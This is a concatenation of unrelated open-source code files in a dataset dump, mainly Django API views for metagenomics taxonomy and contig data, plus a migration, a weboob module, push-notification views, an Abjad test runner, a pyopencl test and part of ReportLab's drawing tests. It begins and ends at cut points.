Example: --- `/annotations/organisms` """ return super(OrganismViewSet, self) \ .list(request, *args, **kwargs) class OrganismTreeViewSet(m_viewsets.ListReadOnlyModelViewSet): """ Provides list of Organisms. """ serializer_class = m_serializers.OrganismSerializer filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'domain', 'prefix', 'lineage', ) lookup_field = 'lineage' lookup_value_regex = '[^/]+' def get_queryset(self): lineage = urllib.parse.unquote( self.kwargs.get('lineage', None).strip()) organism = m_models.Organism.objects \ .filter(lineage=lineage) \ .only('name').distinct('name') if len(organism) == 0: raise Http404(("Attribute error '%s'." % self.lookup_field)) queryset = m_models.Organism.objects \ .filter(M_Q(ancestors__in=organism) | M_Q(name__in=organism)) return queryset def get_serializer_class(self): return super(OrganismTreeViewSet, self).get_serializer_class() def get_serializer_context(self): context = super(OrganismTreeViewSet, self).get_serializer_context() context['lineage'] = self.kwargs.get('lineage') return context def list(self, request, *args, **kwargs): """ Retrieves list of Organisms Example: --- `/annotations/organisms/Bacteria:Chlorobi/children` """ return super(OrganismTreeViewSet, self) \ .list(request, *args, **kwargs) class AnalysisOrganismRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy def annotation_model_property_resolver(self, analysis): """Get the taxonomic annotations using the following order: - SSU -> version <= 5.0 of pipeline - SSU >= 5.0 of pipeline - ITS OneDB {} - ITS unite - LSU """ alternatives = [ "taxonomy", "taxonomy_ssu", "taxonomy_itsonedb", "taxonomy_unite" "taxonomy_lsu", ] for alt in alternatives: try: return getattr(analysis, alt) except AttributeError: pass return EmbeddedDocumentList([], self.annotation_model, "taxonomy") class AnalysisOrganismSSURelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves SSU Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/ssu` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_ssu' class AnalysisOrganismLSURelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves LSU Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/lsu` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_lsu' class AnalysisOrganismITSOneDBRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves ITSoneDB Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/itsonedb` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_itsonedb' class AnalysisOrganismITSUniteRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves ITS UNITE Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/unite` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_itsunite' class AnalysisTaxonomyOverview(APIView): """Get the counts for each taxonomic results for an analysis job. """ def get(self, request, accession): """Get the AnalysisJob and then the AnalysisJobTaxonomy """ job = get_object_or_404( emg_models.AnalysisJob, Q(pk=int(accession.lstrip('MGYA'))) ) analysis = None try: analysis = m_models.AnalysisJobTaxonomy.objects \ .get(analysis_id=str(job.job_id)) except m_models.AnalysisJobTaxonomy.DoesNotExist: raise Http404 return Response({ 'accession': analysis.accession, 'pipeline_version': analysis.pipeline_version, 'taxonomy_count': len(getattr(analysis, 'taxonomy', [])), 'taxonomy_ssu_count': len(getattr(analysis, 'taxonomy_ssu', [])), 'taxonomy_lsu_count': len(getattr(analysis, 'taxonomy_lsu', [])), 'taxonomy_itsunite_count': len(getattr(analysis, 'taxonomy_itsunite', [])), 'taxonomy_itsonedb_count': len(getattr(analysis, 'taxonomy_itsonedb', [])) }) class OrganismAnalysisRelationshipViewSet(m_viewsets.ListReadOnlyModelViewSet): serializer_class = emg_serializers.AnalysisSerializer filter_class = emg_filters.AnalysisJobFilter filter_backends = ( DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter, ) ordering_fields = ( 'job_id', ) ordering = ('-job_id',) search_fields = ( '@sample__metadata__var_val_ucv', ) lookup_field = 'lineage' def get_queryset(self): lineage = urllib.parse.unquote( self.kwargs.get(self.lookup_field, None).strip()) organism = m_models.Organism.objects.filter(lineage=lineage) \ .only('id') if len(organism) == 0: raise NotFound("Lineage not found. Lineage: " + lineage) job_ids = m_models.AnalysisJobTaxonomy.objects \ .filter( M_Q(taxonomy__organism__in=organism) | M_Q(taxonomy_lsu__organism__in=organism) | M_Q(taxonomy_ssu__organism__in=organism) ).distinct('job_id') return emg_models.AnalysisJob.objects \ .filter(job_id__in=job_ids) \ .available(self.request) def get_serializer_class(self): return emg_serializers.AnalysisSerializer def list(self, request, *args, **kwargs): """ Retrieves list of analysis results for the given Organism Example: --- `/annotations/organisms/Bacteria:Chlorobi:OPB56/analysis` """ return super(OrganismAnalysisRelationshipViewSet, self) \ .list(request, *args, **kwargs) class AnalysisContigViewSet(viewsets.ReadOnlyModelViewSet): lookup_field = 'contig_id' lookup_value_regex = '[^/]+' filter_backends = ( filters.OrderingFilter, ) ordering = ('id',) serializer_class = m_serializers.AnalysisJobContigSerializer pagination_class = m_pagination.CursorPagination def get_object(self, ): try: pk = int(self.kwargs['accession'].lstrip('MGYA')) except ValueError: raise Http404() query_set = emg_models.AnalysisJob.objects.available(self.request) return get_object_or_404(query_set, Q(pk=pk)) def get_queryset(self): # noqa C901 """Filter the analysis job contigs """ obj = self.get_object() queryset = m_models.AnalysisJobContig.objects request = self.request query_filter = M_Q() # TODO: simplify! filter_cog = request.GET.get('cog', '').upper() if filter_cog: query_filter |= M_Q(cogs__cog=filter_cog) filter_kegg = request.GET.get('kegg', '').upper() if filter_kegg: query_filter |= M_Q(keggs__ko=filter_kegg) filter_go = request.GET.get('go', '').upper() if filter_go: query_filter |= M_Q(gos__go_term=filter_go) filter_interpro = request.GET.get('interpro', '').upper() if filter_interpro: query_filter |= M_Q(interpros__interpro_identifier=filter_interpro) filter_pfam = request.GET.get('pfam', '').upper() if filter_pfam: query_filter |= M_Q(pfams__pfam_entry=filter_pfam) filter_antismash = request.GET.get('antismash', '').lower() if filter_antismash: query_filter |= M_Q(as_geneclusters__gene_cluster=filter_antismash) if 'facet[]' in request.GET: facets = request.GET.getlist('facet[]') # TODO: try to simplify this facet_qs = M_Q() if len(facets): for facet in [f for f in facets if getattr(m_models.AnalysisJobContig, 'has_' + f, False)]: facet_qs |= M_Q(**{'has_' + facet: True}) else: # contigs with no annotations for f in m_models.AnalysisJobContig._fields: if f.startswith('has_'): facet_qs &= M_Q(**{f: False}) query_filter &= (facet_qs) len_filter = M_Q() filter_gt = request.GET.get('gt', None) filter_lt = request.GET.get('lt', None) if filter_gt: len_filter &= M_Q(length__gte=filter_gt) if filter_lt: len_filter &= M_Q(length__lte=filter_lt) if len_filter: query_filter &= (len_filter) search = request.GET.get('search', '') if search: query_filter &= M_Q(contig_id__icontains=search) identifier = M_Q(job_id=obj.job_id, pipeline_version=obj.pipeline.release_version) return queryset.filter(identifier & query_filter) def retrieve(self, *args, **kwargs): """Retrieve a contig fasta file. The Fasta file will be retrieved using pysam. Example: --- `/analyses/<accession>/contigs/<contig_id>` --- """ obj = self.get_object() contig = self.kwargs['contig_id'] fasta_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, obj.input_file_name + '.fasta.bgz') ) fasta_idx_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, obj.input_file_name + '.fasta.bgz.fai') ) fasta_idx_gzi_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, obj.input_file_name + '.fasta.bgz.gzi') ) if os.path.isfile(fasta_path) and os.path.isfile(fasta_idx_path): output = io.StringIO() # TODO: handle errors with pysam.FastaFile(filename=fasta_path, filepath_index=fasta_idx_path, filepath_index_compressed=fasta_idx_gzi_path) as fasta: rows = fasta.fetch(contig) output.write('>' + emg_utils.assembly_contig_name(contig) + '\n') for row in rows: output.write(row) response = HttpResponse() response['Content-Type'] = 'text/x-fasta' response['Content-Disposition'] = 'attachment; filename={0}.fasta'.format(contig) output.seek(0, os.SEEK_END) response['Content-Length'] = output.tell() response.write(output.getvalue()) return response if settings.DEBUG: return Response('Contig {0} not found.'.format(fasta_path), status.HTTP_404_NOT_FOUND) else: return Response('Contig not found.', status.HTTP_404_NOT_FOUND) @action(detail=True, methods=['get'], url_path='annotations') def retrieve_gff(self, request, *args, **kwargs): """Retrieve a contig GFF file. The are 2 flavors for the GFF files: - COG,KEGG, Pfam, InterPro and EggNOG annotations - antiSMASH By default the action will return the 'main one', unless specified using the querystring param 'antismash=True' The GFF file will be parsed with pysam and sliced. Example: --- /analyses/<accession>/<contig_id>/annotation --- """ obj = self.get_object() contig = self.kwargs['contig_id'] file_prefix = 'annotations' folder = 'functional-annotation' if self.request.GET.get('antismash', False): file_prefix = 'antismash' folder = 'pathways-systems' gff_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, folder, '{}.{}.gff.bgz'.format(obj.input_file_name, file_prefix)) ) gff_idx_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, folder, '{}.{}.gff.bgz.tbi'.format(obj.input_file_name, file_prefix)) ) if os.path.isfile(gff_path) and os.path.isfile(gff_idx_path): # multiple_iterators = True as many processes # could be using the same file at the same moment output = io.StringIO() try: with pysam.TabixFile(filename=gff_path, index=gff_idx_path) as gff: rows = gff.fetch(contig, multiple_iterators=True) for row in rows: output.write(emg_utils.assembly_contig_name(row) + '\n') response = HttpResponse() response['Content-Type'] = 'text/x-gff3' response['Content-Disposition'] = 'attachment; filename={0}.gff'.format(contig) output.seek(0, os.SEEK_END) response['Content-Length'] = output.tell() response.write(output.getvalue()) return response except ValueError: return Response('Contig not found on GFF file.', status.HTTP_404_NOT_FOUND) if settings.DEBUG: return Response('No GFF file for contig {0}.'.format(contig), status.HTTP_404_NOT_FOUND) else: return Response('No GFF file for contig.', status.HTTP_404_NOT_FOUND)
apache-2.0
vaaceves/repue-repositorio-universidad-empresa
home/migrations/0007_auto_20170201_1439.py
1
1649
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2017-02-01 20:39 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('home', '0006_auto_20170131_1404'), ] operations = [ migrations.RenameField( model_name='autor', old_name='pais', new_name='paisResidencia', ), migrations.AddField( model_name='articulo', name='issuu', field=models.TextField(default='blank', max_length=100), ), migrations.AddField( model_name='autor', name='tematicas', field=models.ManyToManyField(to='home.Tematica'), ), migrations.RemoveField( model_name='articulo', name='pais', ), migrations.AddField( model_name='articulo', name='pais', field=models.ManyToManyField(to='home.Pais'), ), migrations.AlterField( model_name='articulo', name='titulo', field=models.CharField(max_length=150), ), migrations.AlterField( model_name='autor', name='institucion', field=models.CharField(max_length=100), ), migrations.AlterField( model_name='autor', name='puesto', field=models.CharField(max_length=150), ), migrations.AlterField( model_name='pais', name='pais', field=models.CharField(max_length=15), ), ]
unlicense
willprice/weboob
modules/explorimmo/module.py
7
2527
# -*- coding: utf-8 -*- # Copyright(C) 2014 Bezleputh # # This file is part of weboob. # # weboob is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # weboob is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with weboob. If not, see <http://www.gnu.org/licenses/>. from weboob.tools.backend import Module from weboob.capabilities.housing import CapHousing, Housing, HousingPhoto from .browser import ExplorimmoBrowser __all__ = ['ExplorimmoModule'] class ExplorimmoModule(Module, CapHousing): NAME = 'explorimmo' DESCRIPTION = u'explorimmo website' MAINTAINER = u'Bezleputh' EMAIL = 'carton_ben@yahoo.fr' LICENSE = 'AGPLv3+' VERSION = '1.1' BROWSER = ExplorimmoBrowser def get_housing(self, housing): if isinstance(housing, Housing): id = housing.id else: id = housing housing = None housing = self.browser.get_housing(id, housing) housing.phone = self.browser.get_phone(id) return housing def search_city(self, pattern): return self.browser.get_cities(pattern) def search_housings(self, query): cities = ['%s' % c.id for c in query.cities if c.backend == self.name] if len(cities) == 0: return list() return self.browser.search_housings(query.type, cities, query.nb_rooms, query.area_min, query.area_max, query.cost_min, query.cost_max, query.house_types) def fill_housing(self, housing, fields): self.browser.get_housing(housing.id, housing) if 'phone' in fields: housing.phone = self.browser.get_phone(housing.id) return housing def fill_photo(self, photo, fields): if 'data' in fields and photo.url and not photo.data: photo.data = self.browser.open(photo.url).content return photo OBJECTS = {Housing: fill_housing, HousingPhoto: fill_photo, }
agpl-3.0
null-none/django-api-push
apps/apps/views.py
2
3056
from django.http import HttpResponse from push_notifications.models import APNSDevice, GCMDevice from rest_framework.views import APIView import json from .models import * from .serializers import * class AddIosDeviceView(APIView): """ Add iOS device. device -- Device parameter (format string) """ def post(self, request, format=None): if request.POST.get('device', None): device = APNSDevice.objects.filter(registration_id=request.POST['device']) if not device: APNSDevice.objects.create(registration_id=request.POST['device']) result = {"result": "ok"} else: result = {"result": "error", 'type': 'invalid format device'} return HttpResponse(json.dumps(result), mimetype='application/json') class AddAndroidDeviceView(APIView): """ Add Android device. device -- Device parameter (format text) """ def post(self, request, format=None): if request.POST.get('device', None): device = GCMDevice.objects.filter(registration_id=request.POST['device']) if not device: GCMDevice.objects.create(registration_id=str(request.POST['device'])) result = {"result": "ok"} else: result = {"result": "error", 'type': 'invalid format device'} return HttpResponse(json.dumps(result), mimetype='application/json') class PushAndroidView(APIView): """ Push notification on device android """ def get(self, request, format=None): for item in GCMDevice.objects.filter(active=True): try: item.send_message("Please update app") except Exception, e: result = {"result": str(e)} return HttpResponse(json.dumps(result), mimetype='application/json') result = {"result": "ok"} return HttpResponse(json.dumps(result), mimetype='application/json') class PushIosView(APIView): """ Push notification on device iOS """ def get(self, request, format=None): for item in APNSDevice.objects.filter(active=True): try: item.send_message("Please update app") except Exception, e: result = {"result": str(e)} return HttpResponse(json.dumps(result), mimetype='application/json') result = {"result": "ok"} return HttpResponse(json.dumps(result), mimetype='application/json') class PushAllView(APIView): """ Push notification on all active device """ def get(self, request, format=None): for item in APNSDevice.objects.filter(active=True): try: item.send_message("Please update app") except Exception, e: pass for item in GCMDevice.objects.filter(active=True): try: item.send_message("Please update app") except Exception, e: pass return HttpResponseRedirect(request.META.get('HTTP_REFERER','/'))
mit
mscuthbert/abjad
abjad/tools/developerscripttools/PyTestScript.py
2
3817
# -*- encoding: utf-8 -*- import argparse import multiprocessing import os from abjad.tools import systemtools from abjad.tools.developerscripttools.DirectoryScript import DirectoryScript class PyTestScript(DirectoryScript): r'''Runs pytest on various Abjad paths. .. shell:: ajv test --help ''' ### PUBLIC PROPERTIES ### @property def alias(self): r'''Alias of script. Returns ``'test'``. ''' return 'test' @property def long_description(self): r'''Long description of script. Returns string or none. ''' return None @property def scripting_group(self): r'''Scripting group of script. Returns none. ''' return None @property def short_description(self): r'''Short description of script. Returns string. ''' return 'Run "pytest" on various Abjad paths.' @property def version(self): r'''Version of script. Returns float. ''' return 1.0 ### PUBLIC METHODS ### def process_args(self, args): r'''Processes `args`. Returns none. ''' import pytest parallel = '' if args.parallel: parallel = '-n {}'.format(multiprocessing.cpu_count()) exitfirst = '' if args.exitfirst: exitfirst = '-x' report = '' if args.report: report = '-r {}'.format(args.report) print('TESTING:') for path in args.path: print('\t{}'.format(path)) print('') path = ' '.join(args.path) command = '{} {} {} {}'.format(parallel, exitfirst, report, path) return pytest.main(command.split()) def setup_argument_parser(self, parser): r'''Sets up argument `parser`. Returns none. ''' from abjad import abjad_configuration parser.add_argument('-p', '--parallel', action='store_true', dest='parallel', help='run pytest with multiprocessing', ) parser.add_argument('-r', '--report', action='store', dest='report', help='show extra test summary info as specified by chars ' + \ '(f)ailed, (E)error, (s)skipped, (x)failed, (X)passed.', metavar='chars', ) parser.add_argument('-x', '--exitfirst', action='store_true', dest='exitfirst', help='stop on first failure', ) group = parser.add_mutually_exclusive_group() group.add_argument('-A', '--all', action='store_const', const=[abjad_configuration.abjad_root_directory], dest='path', help='test all directories, including demos', ) group.add_argument('-D', '--demos', action='store_const', const=[os.path.join( abjad_configuration.abjad_directory, 'demos')], dest='path', help='test demos directory', ) group.add_argument('-M', '--mainline', action='store_const', const=[os.path.join( abjad_configuration.abjad_directory, 'tools')], dest='path', help='test mainline tools directory', ) group.add_argument('-X', '--experimental', action='store_const', const=[abjad_configuration.abjad_experimental_directory], dest='path', help='test experimental directory', ) parser.set_defaults(path=[ os.path.join(abjad_configuration.abjad_directory, 'tools'), abjad_configuration.abjad_experimental_directory ])
gpl-3.0
hughperkins/pub-prototyping
pyopencl/testpointers.py
1
1246
import time import numpy as np import pyopencl as cl gpu_idx = 0 platforms = cl.get_platforms() i = 0 for platform in platforms: gpu_devices = platform.get_devices(device_type=cl.device_type.GPU) if gpu_idx < i + len(gpu_devices): ctx = cl.Context(devices=[gpu_devices[gpu_idx - i]]) break i += len(gpu_devices) print('context', ctx) q = cl.CommandQueue(ctx) mf = cl.mem_flags source = """ struct MyStruct { int myint; }; struct S2 { constant struct MyStruct *s; }; struct S3 { struct MyStruct *s; }; struct S4 { global struct MyStruct *s; }; constant struct MyStruct foo = { 345 }; constant struct S2 bar = { &foo }; constant struct S3 bar2 = { 0 }; kernel void mykernel(global float *float_data, global struct S3 *s3, global struct S4 *s4, global struct MyStruct *astruct) { constant struct MyStruct *f = &foo; constant struct MyStruct **g = &f; constant struct MyStruct *h = bar.s; struct MyStruct *i = bar2.s; struct MyStruct *j = s3->s; global struct S3 *k = s3; global struct S3 **l = &k; struct MyStruct **m = &j; s4->s = astruct; } """ for i, line in enumerate(source.split('\n')): print(i + 1, line) prg = cl.Program(ctx, source).build()
apache-2.0
TaskEvolution/Task-Coach-Evolution
taskcoach/taskcoachlib/thirdparty/src/reportlab/graphics/testshapes.py
3
17121
#!/bin/env python #Copyright ReportLab Europe Ltd. 2000-2012 #see license.txt for license details #history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/testshapes.py # testshapes.py - draws shapes onto a PDF canvas. __version__ = ''' $Id $ ''' __doc__='''Execute this script to see some test drawings. This contains a number of routines to generate test drawings for reportlab/graphics. For now many of them are contrived, but we will expand them to try and trip up any parser. Feel free to add more. ''' import os, sys from reportlab.lib import colors from reportlab.lib.units import cm from reportlab.pdfgen.canvas import Canvas from reportlab.pdfbase.pdfmetrics import stringWidth from reportlab.platypus import Flowable from reportlab.graphics.shapes import * from reportlab.graphics.renderPDF import _PDFRenderer import unittest _FONTS = ['Times-Roman','Vera','Times-BoldItalic',] def _setup(): from reportlab.pdfbase import pdfmetrics, ttfonts pdfmetrics.registerFont(ttfonts.TTFont("Vera", "Vera.ttf")) pdfmetrics.registerFont(ttfonts.TTFont("VeraBd", "VeraBd.ttf")) pdfmetrics.registerFont(ttfonts.TTFont("VeraIt", "VeraIt.ttf")) pdfmetrics.registerFont(ttfonts.TTFont("VeraBI", "VeraBI.ttf")) F = ['Times-Roman','Courier','Helvetica','Vera', 'VeraBd', 'VeraIt', 'VeraBI'] if sys.platform=='win32': for name, ttf in [ ('Adventurer Light SF','Advlit.ttf'),('ArialMS','ARIAL.TTF'), ('Arial Unicode MS', 'ARIALUNI.TTF'), ('Book Antiqua','BKANT.TTF'), ('Century Gothic','GOTHIC.TTF'), ('Comic Sans MS', 'COMIC.TTF'), ('Elementary Heavy SF Bold','Vwagh.ttf'), ('Firenze SF','flot.ttf'), ('Garamond','GARA.TTF'), ('Jagger','Rols.ttf'), ('Monotype Corsiva','MTCORSVA.TTF'), ('Seabird SF','seag.ttf'), ('Tahoma','TAHOMA.TTF'), ('VerdanaMS','VERDANA.TTF'), ]: for D in ('c:\WINNT','c:\Windows'): fn = os.path.join(D,'Fonts',ttf) if os.path.isfile(fn): try: f = ttfonts.TTFont(name, fn) pdfmetrics.registerFont(f) F.append(name) except: pass return F def resetFonts(): for f in _setup(): if f not in _FONTS: _FONTS.append(f) from reportlab.rl_config import register_reset register_reset(resetFonts) resetFonts() ######################################################### # # Collections of shape drawings. # ######################################################### def getFailedDrawing(funcName): """Generate a drawing in case something goes really wrong. This will create a drawing to be displayed whenever some other drawing could not be executed, because the generating function does something terribly wrong! The box contains an attention triangle, plus some error message. """ D = Drawing(400, 200) points = [200,170, 140,80, 260,80] D.add(Polygon(points, strokeWidth=0.5*cm, strokeColor=colors.red, fillColor=colors.yellow)) s = String(200, 40, "Error in generating function '%s'!" % funcName, textAnchor='middle') D.add(s) return D # These are the real drawings to be eye-balled. def getDrawing01(): """Hello World, on a rectangular background. The rectangle's fillColor is yellow. The string's fillColor is red. """ D = Drawing(400, 200) D.add(Rect(50, 50, 300, 100, fillColor=colors.yellow)) D.add(String(180,100, 'Hello World', fillColor=colors.red)) D.add(String(180,86, 'Special characters \xc2\xa2\xc2\xa9\xc2\xae\xc2\xa3\xce\xb1\xce\xb2', fillColor=colors.red)) return D def getDrawing02(): """Various Line shapes. The lines are blue and their strokeWidth is 5 mm. One line has a strokeDashArray set to [5, 10, 15]. """ D = Drawing(400, 200) D.add(Line(50,50, 300,100, strokeColor=colors.blue, strokeWidth=0.5*cm, )) D.add(Line(50,100, 300,50, strokeColor=colors.blue, strokeWidth=0.5*cm, strokeDashArray=[5, 10, 15], )) #x = 1/0 # Comment this to see the actual drawing! return D def getDrawing03(): """Text strings in various sizes and different fonts. Font size increases from 12 to 36 and from bottom left to upper right corner. The first ones should be in Times-Roman. Finally, a solitary Courier string at the top right corner. """ D = Drawing(400, 200) for size in range(12, 36, 4): D.add(String(10+size*2, 10+size*2, 'Hello World', fontName=_FONTS[0], fontSize=size)) D.add(String(150, 150, 'Hello World', fontName=_FONTS[1], fontSize=36)) return D def getDrawing04(): """Text strings in various colours. Colours are blue, yellow and red from bottom left to upper right. """ D = Drawing(400, 200) i = 0 for color in (colors.blue, colors.yellow, colors.red): D.add(String(50+i*30, 50+i*30, 'Hello World', fillColor=color)) i = i + 1 return D def getDrawing05(): """Text strings with various anchors (alignments). Text alignment conforms to the anchors in the left column. """ D = Drawing(400, 200) lineX = 250 D.add(Line(lineX,10, lineX,190, strokeColor=colors.gray)) y = 130 for anchor in ('start', 'middle', 'end'): D.add(String(lineX, y, 'Hello World', textAnchor=anchor)) D.add(String(50, y, anchor + ':')) y = y - 30 return D def getDrawing06(): """This demonstrates all the basic shapes at once. There are no groups or references. Each solid shape should have a green fill. """ green = colors.green D = Drawing(400, 200) #, fillColor=green) D.add(Line(10,10, 390,190)) D.add(Circle(100,100,20, fillColor=green)) D.add(Circle(200,100,40, fillColor=green)) D.add(Circle(300,100,30, fillColor=green)) D.add(Wedge(330,100,40, -10,40, fillColor=green)) D.add(PolyLine([120,10, 130,20, 140,10, 150,20, 160,10, 170,20, 180,10, 190,20, 200,10], fillColor=green)) D.add(Polygon([300,20, 350,20, 390,80, 300,75, 330,40], fillColor=green)) D.add(Ellipse(50,150, 40, 20, fillColor=green)) D.add(Rect(120,150, 60,30, strokeWidth=10, strokeColor=colors.yellow, fillColor=green)) #square corners D.add(Rect(220, 150, 60, 30, 10, 10, fillColor=green)) #round corners D.add(String(10,50, 'Basic Shapes', fillColor=colors.black, fontName='Helvetica')) return D def getDrawing07(): """This tests the ability to translate and rotate groups. The first set of axes should be near the bottom left of the drawing. The second should be rotated counterclockwise by 15 degrees. The third should be rotated by 30 degrees.""" D = Drawing(400, 200) Axis = Group( Line(0,0,100,0), #x axis Line(0,0,0,50), # y axis Line(0,10,10,10), #ticks on y axis Line(0,20,10,20), Line(0,30,10,30), Line(0,40,10,40), Line(10,0,10,10), #ticks on x axis Line(20,0,20,10), Line(30,0,30,10), Line(40,0,40,10), Line(50,0,50,10), Line(60,0,60,10), Line(70,0,70,10), Line(80,0,80,10), Line(90,0,90,10), String(20, 35, 'Axes', fill=colors.black) ) firstAxisGroup = Group(Axis) firstAxisGroup.translate(10,10) D.add(firstAxisGroup) secondAxisGroup = Group(Axis) secondAxisGroup.translate(150,10) secondAxisGroup.rotate(15) D.add(secondAxisGroup) thirdAxisGroup = Group(Axis, transform=mmult(translate(300,10), rotate(30))) D.add(thirdAxisGroup) return D def getDrawing08(): """This tests the ability to scale coordinates. The bottom left set of axes should be near the bottom left of the drawing. The bottom right should be stretched vertically by a factor of 2. The top left one should be stretched horizontally by a factor of 2. The top right should have the vertical axiss leaning over to the right by 30 degrees.""" D = Drawing(400, 200) Axis = Group( Line(0,0,100,0), #x axis Line(0,0,0,50), # y axis Line(0,10,10,10), #ticks on y axis Line(0,20,10,20), Line(0,30,10,30), Line(0,40,10,40), Line(10,0,10,10), #ticks on x axis Line(20,0,20,10), Line(30,0,30,10), Line(40,0,40,10), Line(50,0,50,10), Line(60,0,60,10), Line(70,0,70,10), Line(80,0,80,10), Line(90,0,90,10), String(20, 35, 'Axes', fill=colors.black) ) firstAxisGroup = Group(Axis) firstAxisGroup.translate(10,10) D.add(firstAxisGroup) secondAxisGroup = Group(Axis) secondAxisGroup.translate(150,10) secondAxisGroup.scale(1,2) D.add(secondAxisGroup) thirdAxisGroup = Group(Axis) thirdAxisGroup.translate(10,125) thirdAxisGroup.scale(2,1) D.add(thirdAxisGroup) fourthAxisGroup = Group(Axis) fourthAxisGroup.translate(250,125) fourthAxisGroup.skew(30,0) D.add(fourthAxisGroup) return D def getDrawing09(): """This tests rotated strings Some renderers will have a separate mechanism for font drawing. This test just makes sure strings get transformed the same way as regular graphics.""" D = Drawing(400, 200) fontName = _FONTS[0] fontSize = 12 text = "I should be totally horizontal and enclosed in a box" textWidth = stringWidth(text, fontName, fontSize) g1 = Group( String(20, 20, text, fontName=fontName, fontSize = fontSize), Rect(18, 18, textWidth + 4, fontSize + 4, fillColor=None) ) D.add(g1) text = "I should slope up by 15 degrees, so my right end is higher than my left" textWidth = stringWidth(text, fontName, fontSize) g2 = Group( String(20, 20, text, fontName=fontName, fontSize = fontSize), Rect(18, 18, textWidth + 4, fontSize + 4, fillColor=None) ) g2.translate(0, 50) g2.rotate(15) D.add(g2) return D def getDrawing10(): """This tests nested groups with multiple levels of coordinate transformation. Each box should be staggered up and to the right, moving by 25 points each time.""" D = Drawing(400, 200) fontName = _FONTS[0] fontSize = 12 g1 = Group( Rect(0, 0, 100, 20, fillColor=colors.yellow), String(5, 5, 'Text in the box', fontName=fontName, fontSize = fontSize) ) D.add(g1) g2 = Group(g1, transform = translate(25,25)) D.add(g2) g3 = Group(g2, transform = translate(25,25)) D.add(g3) g4 = Group(g3, transform = translate(25,25)) D.add(g4) return D from widgets.signsandsymbols import SmileyFace def getDrawing11(): '''test of anchoring''' def makeSmiley(x, y, size, color): "Make a smiley data item representation." d = size s = SmileyFace() s.fillColor = color s.x = x-d s.y = y-d s.size = d*2 return s D = Drawing(400, 200) #, fillColor=colors.purple) g = Group(transform=(1,0,0,1,0,0)) g.add(makeSmiley(100,100,10,colors.red)) g.add(Line(90,100,110,100,strokeColor=colors.green)) g.add(Line(100,90,100,110,strokeColor=colors.green)) D.add(g) g = Group(transform=(2,0,0,2,100,-100)) g.add(makeSmiley(100,100,10,colors.blue)) g.add(Line(90,100,110,100,strokeColor=colors.green)) g.add(Line(100,90,100,110,strokeColor=colors.green)) D.add(g) g = Group(transform=(2,0,0,2,0,0)) return D def getDrawing12(): """Text strings in a non-standard font. All that is required is to place the .afm and .pfb files on the font patch given in rl_config.py, for example in reportlab/lib/fonts/. """ faceName = "DarkGardenMK" D = Drawing(400, 200) for size in range(12, 36, 4): D.add(String(10+size*2, 10+size*2, 'Hello World', fontName=faceName, fontSize=size)) return D def getDrawing13(): 'Test Various TTF Fonts' def drawit(F,w=400,h=200,fontSize=12,slack=2,gap=5): D = Drawing(w,h) th = 2*gap + fontSize*1.2 gh = gap + .2*fontSize y = h maxx = 0 for fontName in F: y -= th text = fontName+": I should be totally horizontal and enclosed in a box and end in alphabetagamma \xc2\xa2\xc2\xa9\xc2\xae\xc2\xa3\xca\xa5\xd0\x96\xd6\x83\xd7\x90\xd9\x82\xe0\xa6\x95\xce\xb1\xce\xb2\xce\xb3" textWidth = stringWidth(text, fontName, fontSize) maxx = max(maxx,textWidth+20) D.add( 